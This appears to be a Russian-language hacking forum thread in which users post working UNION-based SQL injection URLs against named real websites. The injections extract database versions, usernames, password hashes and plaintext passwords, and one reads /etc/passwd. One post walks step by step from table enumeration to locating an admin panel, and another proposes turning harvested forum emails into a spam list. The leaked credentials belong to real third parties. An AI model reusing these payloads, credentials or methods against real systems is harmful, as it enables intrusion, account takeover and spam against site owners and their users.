http://www.audiofoundation.org.nz/ Все базы расковырял, где пароли лежат) Code: http://www.audiofoundation.org.nz/artist_page.php?id=-1+union+select+1,concat_ws(0x3a,login ,pass,mail,name),3,4,5,6,7,8,9,10,11,12,13,14+from+audiofoundation_new.users+limit+1,1/* Code: http://www.audiofoundation.org.nz/artist_page.php?id=-1+union+select+1,concat_ws(0x3a,login ,pass,mail),3,4,5,6,7,8,9,10,11,12,13,14+from+drupal.users+limit+1,1/* Code: http://www.audiofoundation.org.nz/artist_page.php?id=-1+union+select+1,concat_ws(0x3a,emai l,password),3,4,5,6,7,8,9,10,11,12,13,14+from+audiofoundation.artistdb+limit+0,1/* Code: http://www.audiofoundation.org.nz/artist_page.php?id=-1+union+select+1,concat_ws(0x3a,emai l,password,name),3,4,5,6,7,8,9,10,11,12,13,14+from+history_forum.LUM_User+limit+0,1/* Code: http://www.audiofoundation.org.nz/artist_page.php?id=-1+union+select+1,concat_ws(0x3a,emai l,password,name),3,4,5,6,7,8,9,10,11,12,13,14+from+afhp_forum.LUM_User+limit+0,1/* Code: http://www.audiofoundation.org.nz/artist_page.php?id=-1+union+select+1,concat_ws(0x3a,mail, password),3,4,5,6,7,8,9,10,11,12,13,14+from+loudblog.lb_authors+limit+0,1/*
www.cetim.ch HTML: http://www.cetim.ch/fr/publications_details.php?pid=-115+UNION+SELECT+1,2,3,4,5,6,7,8,9,concat(version(),0x3a,user(),0x3a,database()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* 5.0.45-log:[email protected]:cetimch HTML: http://www.cetim.ch/fr/publications_details.php?pid=-115+UNION+SELECT+1,2,3,4,5,6,7,8,9,LOAD_FILE('/etc/passwd'),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
search.icq.com Сама уязвимость : Результат за 5 минут: www.mosapteki.ru Alesta:5cda66bc6dcaa02a447c95c8fa4a1ec9 === www.vet.ru spacedefender:ab334feeb31c05124cb73fa12571c2f6:captain === skazki-o-sile.ru admin:0a8a413d9bc599c8e1de5fda8aa6eb02 === www.npnh.ru npnh:a942f5f0961d0154b26e41db069cde6b === www.usinsknet.ru admin:fe01d67a002dfa0f3ac084298142eccdrange === www.liveinstyle.ru admin:ae2b1fca515949e5d54fb22b8ed95575:testing === www.7435588.ru Admin:246edc51f5bbea6acb7b456d4b4a6a7a:yupopa === www.fut-bol.ru 9389ff7e426048ed1ca3aa6b9b341a1d === http://www.manhattan-receivers.com Administrator:8b1910f8606a57e795e0f39f8bcd0d24:ckaljotia === http://www.ua-china.com admin:42bb650a9dfb3927c79ffaaae1e1abce:simfo === http://www.nauticapress.com admin:9ae5bdc58f37d3b242a8c077a5d500f5rvalho ===
вы что реально думаете что icq.com на мускуле работает? там сибэйз асе последней ветки и вобще там права mbread вобщем бесполезно, и нечего мучаться
www.awdf.org HTML: http://www.awdf.org/pages/?pid=2&sid=-24+UNION+SELECT+concat(version(),0x3a,user(),0x3a,database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* 5.0.22:robin@localhost:dbawdf3 HTML: http://www.awdf.org/pages/?pid=2&sid=-24+UNION+SELECT+count(table_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+information_schema.tables/* В ответ я получил 1906, но проверив, таблиц оказалось меньше 100 =) HTML: http://www.awdf.org/pages/?pid=2&sid=-24+UNION+SELECT+concat(userid,0x3a,username,0x3a,password,0x3a,email),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+adminusers+LIMIT+0,1/* 1:test:test:[email protected] 2:vera:test:[email protected] (http://www.awdf.org/admin/index.php) HTML: http://www.awdf.org/pages/?pid=2&sid=-24+UNION+SELECT+concat(userid,0x3a,username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+dbacademicafrica.aa_user+LIMIT+5,1/* 11:admin:AA6tQYSfGxd/A HTML: http://www.awdf.org/pages/?pid=2&sid=-24+UNION+SELECT+concat(memberid,0x3a,email,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+dbacademicafrica.aa_member+LIMIT+650,1/* 655:[email protected]:johnog
http://www.72dpi.co.nz/ Code: http://www.72dpi.co.nz/packages/index.php?pid=-1+union+select+1,convert(concat_ws(0x3a,us er(),database(),version())+using+latin1),3,4/*
http://policies.lakeheadu.ca HTML: http://policies.lakeheadu.ca/policy.php?pid=-178+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a,version(),user(),database()),19/* 4.1.21-standard-log:admini@localhost:administration
http://www.botellaalmar.com.ar/ Code: http://www.botellaalmar.com.ar/detalle_nota.php?Id=10002&tipo=-1+union+select+concat_ws(0x3a,user(),version(),database())/*
www.7courier.com 4.1.22-standard:thetphyo_7courier:thetphyo_7c@localhost www.belledune.com 5.0.18-nt :belledunedb: belleduneUSER@localhost www.visitrandolphcounty.com 4.1.20: visitrandolph: visitran@localhost
предистория)) нужно было найти траф.. ну а траф у нас где?) правильно еротика и тд поиск мне помог нашли сайт http://svalka.biz/go.php?go=Download&id=17985/* http://svalka.biz/go.php?go=Download&id=17985+order+by+6/* 6 полей http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6/* #5.0.22-log::glamur_svalka@localhost::glamur_svalka 5-тая версия - тянем всю инфу http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6+fromusers/* http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ws(0x3A3a,TABLE_SCHEMA,TABLE_NAME),3,4,5,6+from+information_schema.tables/* таблици /*жалко видно таблици только этого хоста*/ glamur_svalka::admin glamur_svalka::comments glamur_svalka::downloads glamur_svalka::fail_logs glamur_svalka::iplogg glamur_svalka::linker glamur_svalka::main_logs glamur_svalka::que glamur_svalka::site_downloads glamur_svalka::succes_logs http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ws(0x3A3a,TABLE_SCHEMA,TABLE_NAME,column_name),3,4,5,6+from+information_schema.columns/* ну и сами поля /*выбраны сами интересные таблы*/ glamur_svalka::succes_logs::time glamur_svalka::succes_logs::date glamur_svalka::succes_logs::ref glamur_svalka::succes_logs::agent glamur_svalka::succes_logs::hostname glamur_svalka::succes_logs::ip glamur_svalka::succes_logs:assword glamur_svalka::succes_logs::username glamur_svalka::succes_logs::id glamur_svalka::fail_logs::time glamur_svalka::fail_logs::date glamur_svalka::fail_logs::ref glamur_svalka::fail_logs::agent glamur_svalka::fail_logs::hostname glamur_svalka::fail_logs::ip glamur_svalka::fail_logs:assword glamur_svalka::fail_logs::username glamur_svalka::fail_logs::id glamur_svalka::admin::id glamur_svalka::admin::username glamur_svalka::admin:assword glamur_svalka::admin::email glamur_svalka::admin::level http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ws(0x3A3a,id,username,password,email,level),3,4,5,6+from+glamur_svalka.admin/* достаем данные пользователей 1::admin::admin::[email protected]::1 мдям.. тяжелый пасс =\ теперь админка.. по стандартным местам ее нет.. смотрим в логах /*нестандартный ход)))*/ http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ws(0x3A3a,ip,username,password,ref,hostname),3,4,5,6+from+glamur_svalka.succes_logs/* и мне выдало адресс админки)) http://svalka.biz/admin/admincp.php?action=login или подругому з.ы. в админке нет ничего особо интересного =\ з.з.ы. шел не залил =\
журнал ironman таблицы, где встречается колонки похожие на "pass" имеется таблица - account - это от форума. форум кончелыжный, через него замутить ничего нельзя. далее нашлась таблица curent_user - хер пойми что это. там одна запись всего - loginassword есть админка: нихрена туда логины и пароли из форума и расшифрованные не катят (БЛ*ТЬ!!!) есть вебмайл: и phpmyadmin: добытые пароли, ествественно, никуда не подходят. доступ к таблице mysql.user - закрыт. что еще замутить я больше не знаю! P.S. из базы имэйлов на форуме можно сделать спам-базу для рассылки рекламы виагры. Думаю, отдача будем ошелмляющей (на форуме качки обсуждают стеройды)
http://www.centrgroup.ru/nn.php?id=-%201+union+select+1,2,3,4,5,concat(id,0x20,user_name,0x3a,user_pass),7+from+users+where+id=0/* Тока вот до админки не дорылся...
http://www.tni.mil.id/patriotweb/?action=PesanSaran&ed=-1+union+select+0,1,concat(username,0x3a,password,0x3a,email)+from+user/*
www.ipz.ru http://www.ipz.ru/alltop.php?cat=-1+union+select+version()/* Версия: 5.0.41-community http://www.ipz.ru/alltop.php?cat=-1+union+select+concat(login,char(58),password,char(58),email)+from+users+limit+0,1/* Там 1499 юзеров....Можно через Limit
